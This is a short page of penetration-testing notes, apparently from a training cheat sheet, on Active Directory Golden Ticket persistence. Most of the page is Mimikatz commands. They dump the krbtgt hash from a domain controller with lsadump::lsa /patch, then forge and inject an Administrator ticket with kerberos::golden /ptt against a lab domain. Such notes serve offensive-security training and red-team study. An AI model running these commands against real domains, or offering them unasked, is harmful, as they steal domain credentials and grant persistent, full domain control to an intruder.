Golden Ticket

Golden Ticket -> NTLM hash of the krbtgt

sid = domain sid id=500 group=512

# Execute mimikatz on DC as Doamin Admin to get krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcrop-dc

privilege::debug
lsadump::lsa /patch


#On any machine:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: /krbtgt: /id: /groups: /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: /krbtgt: /id: /groups: /startoffset:0 /endin:600 /renewmax:10080 /ptt

misc::cmd

PreviousDomain PersistanceNextShadow Copies

Last updated